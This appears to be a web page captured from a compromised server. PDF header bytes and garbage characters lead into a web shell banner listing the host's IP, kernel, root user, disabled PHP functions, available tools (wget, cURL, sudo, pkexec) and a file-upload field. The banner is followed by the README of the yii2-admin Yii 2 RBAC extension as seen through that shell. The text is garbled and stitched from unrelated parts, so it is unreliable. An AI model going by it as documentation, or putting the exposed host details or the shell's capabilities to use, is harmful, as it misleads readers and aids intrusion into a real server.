%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/11584/cwd/html/ppaobm/vendor/mdmsoft/yii2-admin/ |
Upload File : |
RBAC Manager for Yii 2 ====================== GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user :smile:. [](https://packagist.org/packages/mdmsoft/yii2-admin) [](https://packagist.org/packages/mdmsoft/yii2-admin) [](https://packagist.org/packages/mdmsoft/yii2-admin) [](https://packagist.org/packages/mdmsoft/yii2-admin) [](https://www.versioneye.com/php/mdmsoft:yii2-admin/references) [](http://travis-ci.org/mdmsoft/yii2-admin) [](https://www.versioneye.com/php/mdmsoft:yii2-admin/dev-master) [](https://scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master) [](https://codeclimate.com/github/mdmsoft/yii2-admin) Documentation ------------- > **Important: If you install version 3.x, please see [this readme](https://github.com/mdmsoft/yii2-admin/blob/3.master/README.md#upgrade-from-2x).** - [Change Log](CHANGELOG.md). - [Authorization Guide](http://www.yiiframework.com/doc-2.0/guide-security-authorization.html). Important, read this first before you continue. - [Basic Configuration](docs/guide/configuration.md) - [Basic Usage](docs/guide/basic-usage.md). - [User Management](docs/guide/user-management.md). - [Using Menu](docs/guide/using-menu.md). - [Api](https://mdmsoft.github.io/yii2-admin/index.html). Installation ------------ ### Install With Composer The preferred way to install this extension is through [composer](http://getcomposer.org/download/). Either run ``` php composer.phar require mdmsoft/yii2-admin "~1.0" or php composer.phar require mdmsoft/yii2-admin "~2.0" ``` or for the dev-master ``` php composer.phar require mdmsoft/yii2-admin "2.x-dev" ``` Or, you may add ``` "mdmsoft/yii2-admin": "~2.0" ``` to the require section of your `composer.json` file and execute `php composer.phar update`. ### Install From the Archive Download the latest release from here [releases](https://github.com/mdmsoft/yii2-admin/releases), then extract it to your project. In your application config, add the path alias for this extension. ```php return [ ... 'aliases' => [ '@mdm/admin' => 'path/to/your/extracted', // for example: '@mdm/admin' => '@app/extensions/mdm/yii2-admin-2.0.0', ... ] ]; ``` [**More...**](docs/guide/configuration.md) [screenshots](https://goo.gl/r8RizT)